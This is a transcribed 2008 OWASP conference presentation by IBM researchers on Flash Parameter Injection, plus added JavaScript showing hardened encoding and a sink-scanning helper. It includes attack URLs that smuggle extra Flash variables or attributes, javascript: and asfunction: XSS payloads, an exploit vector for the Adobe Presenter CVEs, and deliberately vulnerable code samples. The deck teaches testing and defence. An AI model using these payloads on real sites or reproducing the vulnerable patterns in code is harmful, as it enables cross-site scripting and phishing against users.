
Flash Parameter Injection. The OWASP Foundation, 25/09/2008. Ayal Yogev, Adi Sharabani, IBM Rational Application Security.


Slide 1: Flash Parameter Injection
The OWASP Foundation, http://www.owasp.org, 25/09/2008
Ayal Yogev, Adi Sharabani, IBM Rational Application Security {ayal, adish}

Slide 2: Agenda
- Flash 101
- Flash Security
- The Problem
- Flash Parameter Injection
- Real Example
- Testing

Slide 3: Flash 101

Slide 4: Background
- Introduced in 1996
- Adds animation and interactivity to Web pages
- Contains a scripting language: ActionScript
- Very popular: installed on over 99% of PCs (http://www.adobe.com/products/player_census/flashplayer/)
- Advanced technologies:
  - Flex
  - Adobe AIR

Slide 5: Accessing Flash movies
- Can be embedded in HTML pages
[Diagram "My Flash Movie": Host (Browser) > Flash Player > Flash Movie (SWF)]

Slide 6: Accessing Flash movies
- Can be embedded in HTML pages
- Can be accessed directly
  - http://host/movie.swf
  - A "dummy" HTML page may be created (browser dependent)
  - DOM access according to policy
  - Example (Firefox):
    <embed width="100%" height="100%" name="plugin" src="http://host/movie.swf" type="application/x-shockwave-flash"/>

Slide 7: Global Flash Variables
- ActionScript supports global variables
- Global variables can be assigned from outside the movie
- Common use:
    if (_root.myparam == undefined) {
        _root.myparam = "my default value";
    }

Slides 8-9: Global Flash Variables
- ActionScript supports global variables
- Global variables can be assigned from outside the movie
- Assigning global variables as parameters:
  - Direct reference: http://host/movie.swf?a=5&b=hello
  - Embedded URI: <object type="application/x-shockwave-flash" data="movie.swf?a=5&b=hello" width="600" height="345">
  - Flash attributes: <object type="application/x-shockwave-flash" data="movie.swf" flashvars="a=5&b=hello">

Slide 10: Flash Security

Slide 11: Previous Research
- Bypassing JavaScript Filters – the Flash! Attack. Eye on Security, August 2002
- Misuse of Macromedia Flash Ads clickTAG Option May Lead to Privacy Breach. Scan Security Wire, April 2003
- Testing Flash Applications. Stefano Di Paola, May 2007
- Finding Vulnerabilities in Flash Applications. Stefano Di Paola, November 2007

Slide 12: Controlling Global Flash Variables can result in...
- Cross-Site Flashing
- Cross-Site Scripting through Flash
- Phishing
- Flow Manipulation
- ...

Slide 13: Cross-Site Flashing
- A vulnerable movie is tricked into loading a malicious movie
- The malicious movie gets access to the same sandbox
- Can be achieved using methods like loadMovie*:
    if (_root.movieURI == undefined) {
        _root.movieURI = "http://host/movie.swf";
    }
    loadMovieNum(_root.movieURI, 1);
- Attack vector: http://host/movie.swf?movieURI=maliciousFile.swf
[Diagram: Flash Player > Flash Movie, then Flash Player > Malicious Flash]

Slide 14: Cross-Site Scripting through Flash
- Classic XSS using a vulnerable Flash file
- Can be triggered by the use of global Flash variables in:
  - getURL, using payload javascript:alert('XSS')
  - Load* functions, using payload asfunction:getURL,javascript:alert('XSS')
  - TextField.htmlText, using payload
  - ...

Slide 15: Cross-Site Scripting through Flash (Example)
- Consider movie.swf containing the code:
    if (_root.url == undefined) {
        _root.url = "http://host/";
    }
    getURL(_root.url);

Slides 16-18: Normal Usage

Slide 19: Cross-Site Scripting through Flash (Example)
- Attack vector: http://host/movie.swf?url=javascript:alert('gotcha!')
    if (_root.url == undefined) {
        _root.url = "http://host/";
    }
    getURL(_root.url);

Slides 20-22: Cross-Site Scripting through Flash (Example)

Slide 23: The Problem

Slide 24: The Missing Link
- Flash cannot always load without the original HTML
- Flash movies may rely on parts of the DOM to execute
  - Use JavaScript variables and methods
  - Use HTML DOM elements
- Direct access to Flash may be restricted due to security
[Diagram: Host (Browser) > Flash Player > Flash Movie (SWF)]

Slides 25-29: The Missing Link - Example

Slide 31: Known examples of Flash attacks involve accessing the movie directly

Slide 32: BUT... Some Flash movies cannot load when accessed directly

Slide 33: FPI: Injecting global variables into Flash in its original HTML environment

Slide 34: FPI Techniques

Slide 35: Reflected FPI
- Possible when the location of the Flash movie is retrieved through a URL parameter:
    # Embed the Flash movie
    print '<object type="application/x-shockwave-flash" data="' . $params{movie} . '">';
- Attack example: http://host/index.cgi?movie=movie.swf?globalVar=e-v-i-l
- Resulting HTML:
    <object type="application/x-shockwave-flash" data="movie.swf?globalVar=e-v-i-l">

Slide 36: Reflected FPI (Piggybacking FlashVars)
- Attack possible when global Flash variables are received from HTML parameters without sanitization:
    # Read the 'language' parameter and strip double quotes only
    my $language = $params{language};
    $language =~ s/"//g;
    # Embed the Flash movie
    print '<object type="application/x-shockwave-flash" data="movie.swf" flashvars="language=' . $language . '">';
- Attack occurs when the victim is lured to click on a link like:
    http://host/index.cgi?language=English%26globalVar=e-v-i-l
- %26 is decoded to &, so the generated page contains:
    ... <object type="application/x-shockwave-flash" data="movie.swf" flashvars="language=English&globalVar=e-v-i-l"> ...

Slide 37: FlashVars Injection
- Possible when an attribute of the object tag is received as a parameter:
    # Embed the Flash movie
    print "<object type='application/x-shockwave-flash' data='movie.swf' width='$params{width}'>";
- Attack vector: http://host/index.cgi?width=600%27%20flashvars=%27globalVar=e-v-i-l
- Decoded value: 600' flashvars='globalVar=e-v-i-l
- Resulting HTML:
    <object type='application/x-shockwave-flash' data='movie.swf' width='600' flashvars='globalVar=e-v-i-l'>

Slide 38: DOM Based FPI
- document.location is used as a global Flash variable:
    var s = '';
    var loc = encodeURI(document.location);
    s += '<embed src="movie.swf" flashvars="location=' + loc + '">';
    document.write(s);

Slide 39: DOM Based FPI (continued)
- Attack vector: http://host/index.htm#&globalVar=e-v-i-l
- The global variable is injected into the Flash movie embedded inside the DOM:
    <embed src="movie.swf" flashvars="location=http://host/index.htm#&globalVar=e-v-i-l">

Slide 40: DOM Based FPI (continued)
- The JavaScript function encodeURI is not sufficient in this case
  - Can prevent DOM based XSS but not DOM based FPI
  - Does not encode all characters (e.g. '&', '?')
  - encodeURIComponent, escape or similar methods must be used
  - Appropriate encoding must be used (depending on context)
- Attack is invisible to IDS and IPS
  - Data following '#' is not sent to the server ('?' also works, but data following it is sent to the server)
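The flawed compositions from slides 36, 37 and 38 next to hardened ones, as an added JavaScript example that is not part of the presentation; the function names and the small FlashVars parser (my approximation of how the player splits the string into global variables) are my own.

```javascript
// Added example, not from the presentation: the compositions from slides 36,
// 37 and 38 next to hardened versions. Function names are my own.
// Approximates how the player splits "a=5&b=hello" into global variables.
function parseFlashVars(s) {
  const vars = {};
  for (const pair of s.split("&")) {
    if (!pair) continue;
    const i = pair.indexOf("=");
    const key = i < 0 ? pair : pair.slice(0, i);
    const val = i < 0 ? "" : pair.slice(i + 1);
    vars[decodeURIComponent(key)] = decodeURIComponent(val);
  }
  return vars;
}

// Slide 36: the query value is already URL-decoded (%26 -> &) when the CGI
// strips only double quotes, so a second variable piggybacks on "language".
function piggybackedFlashVars(language) {
  return "language=" + language.replace(/"/g, "");
}

// Slide 38: encodeURI leaves "#", "&" and "=" alone, so a fragment such as
// "#&globalVar=e-v-i-l" survives into the flashvars string unchanged.
function domFlashVarsWeak(location) {
  return "location=" + encodeURI(location);
}

// Fix for both: encode every value as a URI component so "&" and "=" inside
// a value can never start a new variable.
function safeFlashVars(vars) {
  return Object.entries(vars)
    .map(([k, v]) => encodeURIComponent(k) + "=" + encodeURIComponent(v))
    .join("&");
}

// Slide 37: an attribute value concatenated raw lets a quote close width='...'
// and append a flashvars='...' attribute of the attacker's choosing.
function embedTagWeak(width) {
  return "<object type='application/x-shockwave-flash' data='movie.swf' width='" + width + "'>";
}

// Fix: HTML-attribute-encode the value so a quote cannot end the attribute.
function attrEscape(v) {
  return String(v).replace(/&/g, "&amp;").replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;").replace(/</g, "&lt;").replace(/>/g, "&gt;");
}
function embedTagSafe(width) {
  return "<object type='application/x-shockwave-flash' data='movie.swf' width='" + attrEscape(width) + "'>";
}
```

Parsing the weak outputs yields a separate globalVar variable, while the safe forms keep the injected text inside the value or attribute it was meant for.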

Slide 41: Persistent FPI
- Shared local Flash objects (a.k.a. Flash cookies)
  - Used to store persistent data across multiple sessions and save Flash state
- Storing shared local Flash objects:
    // Create a shared object
    mySharedObject = SharedObject.getLocal("sharedObjName");
    // Store data in the shared object
    mySharedObject.data.name = "jsmith";
    mySharedObject.data.homepage = "http://demo.testfire.net";
    // Flush
    mySharedObject.flush();

Slide 42: Persistent FPI (continued)
- Loading shared local Flash objects:
    // Create a new shared object or read an existing one
    mySharedObject = SharedObject.getLocal("sharedObjName");
    // Check whether variable name exists
    if (mySharedObject.data.name == null) {
        // Shared object doesn't exist
    } else {
        // Read the name
        name = mySharedObject.data.name;
        // Read the homepage
        homepage = mySharedObject.data.homepage;
    }

Slide 43: Persistent FPI (continued)
- Shared local Flash object is controlled by user input
- Object is used inside the getURL method
    // Create a new shared object or read an existing one
    mySharedObject = SharedObject.getLocal("urlToLoad");
    // Check whether there is a shared object saved
    if (mySharedObject.data.url == null) {
        // Store the URL in a shared object
        mySharedObject.data.url = _root.inputURL;
    }
    // Get the URL
    getURL(mySharedObject.data.url);
[Diagram: Host (Browser) > Flash Player > Flash Movie; on later loads, Flash Player > Flash Movie]

Slide 44: Persistent FPI (continued)
- After the first infection, XSS will be executed every time the movie is loaded
- Attack can persist after the vulnerability is fixed
- IDS or IPS will only be able to detect the initial infection

Slide 45: Example: CVE-2008-3515, CVE-2008-3516

Slide 46: Adobe Presenter FPI Vulnerability
- Illustration of the automatically created HTML:
    function showFlash(swf, w, h, loop) {
        var myLocation = document.location;
        //...
        s += '<param name="FlashVars" value="' +
            'initialURL=' + myLocation + '&isMSIE=' + isMSIE + '&useBSM=false" />';
        //...
        document.write(s);
    }
- The same function with document.location passed through encodeURI:
    function showFlash(swf, w, h, loop) {
        var myLocation = encodeURI(document.location);
        //...
        s += '<param name="FlashVars" value="' +
            'initialURL=' + myLocation + '&isMSIE=' + isMSIE + '&useBSM=false" />';
        //...
        document.write(s);
    }

Slide 47: Adobe Presenter FPI Vulnerability (continued)
- Movie Viewer.swf vulnerable to XSS through Flash:
  - Global parameter _url with payload "javascript:alert('XSS')"
  - Global parameter baseurl with payload "asfunction:getURL,javascript:alert('XSS')"
  - Works in Flash Player version 9,0,47,0 on both IE and Firefox
- DOM based FPI allows the Flash to load within the original HTML
  - Invisible to IPS/IDS
- Vendors must recompile their Flash files to fix the problem
- Attack vector: http://host/index.htm#&_url=javascript:alert(document.domain)

Slide 48: Testing

Slide 49: Testing
- Identify controlled Flash parameters:
  - Query parameters (from HTML)
  - FlashVars (from HTML)
  - Uninstantiated variables (from ActionScript)
- Locate potentially dangerous code:
  - Where controlled Flash parameters are used inside methods like getURL, loadMovie, etc.
  - Save sequences leading to potentially dangerous code
  - Associate with parameter

Slide 50: Testing (continued)
- Mutation: inject values into the parameters
  - XSS: javascript:window.open('http://my.site')
  - XSF: http://my.site/movie.swf
  - Phishing: http://my.site
- Validation
  - Play relevant sequences belonging to the mutated parameter
  - Verify test results
    - Browser events
    - ActionScript level
- Test the Flash movie within its original HTML environment
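A small static triage helper for the "identify controlled parameters" and "locate potentially dangerous code" steps above, added here as an example; it is not part of the presentation or of any IBM tool, and the sink list, regular expressions and sample ActionScript are my own.

```javascript
// Added example, not from the presentation: lists global parameters
// (_root.<name>) in ActionScript 2 source and reports each one that reaches
// a sink such as getURL or loadMovie*. Sink list and sample are my own.
const SINKS = ["getURL", "loadMovie", "loadMovieNum", "loadVariables", "htmlText"];

// Every distinct _root.<name> referenced in the source, sorted.
function controlledParams(src) {
  const names = new Set();
  for (const m of src.matchAll(/_root\.([A-Za-z_$][\w$]*)/g)) names.add(m[1]);
  return [...names].sort();
}

// Each line where a sink is called (getURL(...)) or assigned (x.htmlText = ...)
// with a controlled parameter in its argument. Lines are 1-based for lookup.
function dangerousUses(src) {
  const hits = [];
  src.split("\n").forEach((text, idx) => {
    for (const sink of SINKS) {
      // \b keeps "loadMovie" from matching inside "loadMovieNum"
      const m = text.match(new RegExp("\\b" + sink + "\\s*[(=]([^;]*)"));
      if (!m) continue;
      for (const param of controlledParams(m[1])) {
        hits.push({ sink, param, line: idx + 1 });
      }
    }
  });
  return hits;
}

// Constructed sample mirroring the snippets on slides 13, 14 and 15.
const SAMPLE_AS2 = [
  'if (_root.url == undefined) { _root.url = "http://host/"; }',
  "getURL(_root.url);",
  'if (_root.movieURI == undefined) { _root.movieURI = "http://host/movie.swf"; }',
  "loadMovieNum(_root.movieURI, 1);",
  "caption.htmlText = _root.caption;",
].join("\n");
```

Running dangerousUses(SAMPLE_AS2) gives one finding per sink line, each paired with the parameter to mutate in the next step.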

Slide 51: More details
- IBM Rational Application Security Insider Blog (containing presentation and whitepaper):
  - http://blog.watchfire.com
- Flash movie demonstrating XSF and XSS through Flash:
  - http://demo.testfire.net/vulnerable.swf
- Contact:
  - Ayal Yogev (Senior Security Researcher): ayal
  - Adi Sharabani (Security Research Group Manager): adish

Slide 52: Questions?
